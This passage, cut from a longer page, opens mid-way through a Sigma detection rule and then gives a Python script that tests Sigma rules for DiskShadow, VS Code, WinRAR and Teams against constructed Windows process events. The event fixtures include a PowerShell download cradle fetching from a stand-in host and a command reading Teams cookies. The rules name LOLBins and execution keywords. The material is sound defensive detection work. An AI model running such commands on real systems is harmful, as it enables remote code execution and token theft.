        Image|endswith: '\Microsoft\Teams\current\Teams.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
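The parent/child rules above (DiskShadow, VsCode, WinRAR and KeyScrambler share one shape; the Teams rule adds a filter) are worth dry-running against a handful of events before they go into a saved search. The script below is an added example, not code from the Sigma project or from this site: a minimal evaluator for the Sigma constructs these rules use (`endswith`, `contains`, plain equality, list-OR, `1 of` / `all of`, `not` filters), applied to constructed process_creation events. The rule definitions are transcribed from the YAML above; the evaluator, the helper names and every event are assumptions made for the example. Two things it makes visible: the DiskShadow false positive documented in that rule (an admin script whose EXEC line launches PowerShell fires the rule exactly like an attacker's would), and that the VsCode rule's `Invoke-Expressions` entry, plural as written, never matches the spelled-out cmdlet `Invoke-Expression`, so a task that uses the long form without `IEX` or a download cradle slips past it. Note also that the rendered Carbon Black queries keep Sigma's field names (`ParentImage`, `Image`, `CommandLine`, `OriginalFileName`); map those to the field names your Carbon Black deployment actually exposes before deploying.

```python
import re

# Rules are transcribed from the Sigma YAML on this page (DiskShadow, VsCode,
# WinRAR, Teams). The evaluator, helper names and events are constructed here.

def _match_value(value, pattern, modifier):
    # Sigma compares strings case-insensitively unless a cased modifier is used
    v, p = str(value).lower(), str(pattern).lower()
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "contains":
        return p in v
    return v == p                                   # no modifier: exact match

def _match_field(event, field_spec, patterns):
    field, _, modifier = field_spec.partition("|")
    if field not in event:
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    return any(_match_value(event[field], p, modifier) for p in patterns)  # values: OR

def _match_selection(event, selection):
    if isinstance(selection, list):                 # list of maps: OR between maps
        return any(_match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())  # map: AND

def evaluate(rule, event):
    """True when the event satisfies the rule's condition string."""
    det = rule["detection"]
    results = {n: _match_selection(event, s) for n, s in det.items() if n != "condition"}

    def quantifier(m):                              # "1 of x_*" / "all of x_*"
        hits = [r for n, r in results.items() if n.startswith(m.group(2))]
        return str(any(hits) if m.group(1) == "1" else all(hits))

    expr = re.sub(r"\b(1|all) of (\w+?)\*", quantifier, det["condition"])
    expr = re.sub(r"\b\w+\b", lambda m: str(results.get(m.group(0), m.group(0))), expr)
    # only booleans, boolean operators and parentheses may reach eval
    assert set(re.findall(r"\w+", expr)) <= {"True", "False", "and", "or", "not"}, expr
    return bool(eval(expr, {"__builtins__": {}}, {}))

LOLBINS = ["\\cmd.exe", "\\cscript.exe", "\\mshta.exe", "\\powershell.exe",
           "\\pwsh.exe", "\\regsvr32.exe", "\\rundll32.exe", "\\wscript.exe"]
DISKSHADOW = {"detection": {
    "selection": {"ParentImage|endswith": "\\diskshadow.exe",
                  "Image|endswith": ["\\certutil.exe"] + LOLBINS[1:]},   # no cmd.exe in this rule
    "condition": "selection"}}
VSCODE = {"detection": {
    "selection_parent": {"ParentImage|endswith": "\\code.exe"},
    "selection_children_images": {"Image|endswith": [
        "\\calc.exe", "\\regsvr32.exe", "\\rundll32.exe", "\\cscript.exe", "\\wscript.exe"]},
    "selection_children_cli": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe", "\\cmd.exe"],
                               "CommandLine|contains": ["Invoke-Expressions", "IEX", "Invoke-Command", "ICM",
                                                        "DownloadString", "rundll32", "regsvr32", "wscript", "cscript"]},
    "selection_children_paths": {"Image|contains": [":\\Users\\Public\\", ":\\Windows\\Temp\\", ":\\Temp\\"]},
    "condition": "selection_parent and 1 of selection_children_*"}}
WINRAR = {"detection": {
    "selection_parent": {"ParentImage|endswith": "\\WinRAR.exe"},
    "selection_binaries": [{"Image|endswith": LOLBINS},      # either branch suffices
                           {"OriginalFileName": ["Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE",
                                                 "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"]}],
    "condition": "all of selection_*"}}
TEAMS = {"detection": {
    "selection": {"CommandLine|contains": ["\\Microsoft\\Teams\\Cookies",
                                           "\\Microsoft\\Teams\\Local Storage\\leveldb"]},
    "filter_main_legit_locations": {"Image|endswith": "\\Microsoft\\Teams\\current\\Teams.exe"},
    "condition": "selection and not 1 of filter_main_*"}}

CODE = "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"
EVENTS = {  # constructed process_creation events in Sigma field names, not real telemetry
    # documented DiskShadow FP: an admin script whose EXEC line runs a cleanup script
    "diskshadow_admin_exec": {"ParentImage": "C:\\Windows\\System32\\diskshadow.exe", "Image": PS,
                              "CommandLine": "powershell.exe -File C:\\Backup\\post-snapshot.ps1"},
    "vscode_download_cradle": {"ParentImage": CODE, "Image": CMD, "CommandLine":
        "cmd.exe /c powershell -nop -c \"IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/s'))\""},
    # spelled-out cmdlet: 'Invoke-Expressions' (plural, as in the rule) never matches it
    "vscode_long_cmdlet": {"ParentImage": CODE, "Image": PS, "CommandLine":
        "powershell.exe -c \"Invoke-Expression (Get-Content C:\\proj\\build.ps1 -Raw)\""},
    "vscode_build": {"ParentImage": CODE, "Image": "C:\\Program Files\\dotnet\\dotnet.exe",
                     "CommandLine": "dotnet build"},
    # renamed cmd.exe: the Image branch misses it, the OriginalFileName branch catches it
    "winrar_renamed_cmd": {"ParentImage": "C:\\Program Files\\WinRAR\\WinRAR.exe",
                           "Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\invoice.exe",
                           "OriginalFileName": "Cmd.Exe", "CommandLine": "invoice.exe /c start notes.txt"},
    "teams_token_read": {"ParentImage": "C:\\Windows\\explorer.exe", "Image": CMD,
                         "CommandLine": "cmd.exe /c type \"%APPDATA%\\Microsoft\\Teams\\Cookies\""},
    "teams_itself": {"ParentImage": "C:\\Users\\dev\\AppData\\Local\\Microsoft\\Teams\\Update.exe",
                     "Image": "C:\\Users\\dev\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
                     "CommandLine": "Teams.exe --user-data-dir=\"%APPDATA%\\Microsoft\\Teams\\Local Storage\\leveldb\""},
}

def alerts():
    """Rule name -> sorted names of the constructed events that fire it."""
    rules = {"DiskShadow": DISKSHADOW, "VsCode": VSCODE, "WinRAR": WINRAR, "Teams": TEAMS}
    return {name: sorted(e for e, ev in EVENTS.items() if evaluate(r, ev)) for name, r in rules.items()}

if __name__ == "__main__":
    print(alerts())
```

Running it prints, per rule, which of the constructed events fire: the admin DiskShadow script, the VsCode download cradle but not the spelled-out `Invoke-Expression` task or the `dotnet build`, the renamed `cmd.exe` under WinRAR, and the Teams cookie read but not Teams.exe itself. Sigma matching is case-insensitive by default, which is why `OriginalFileName: Cmd.Exe` and the `Code.exe` parent match the lower-cased comparisons here; confirm that the field comparisons in your Carbon Black deployment behave the same way before relying on the `OriginalFileName` branch.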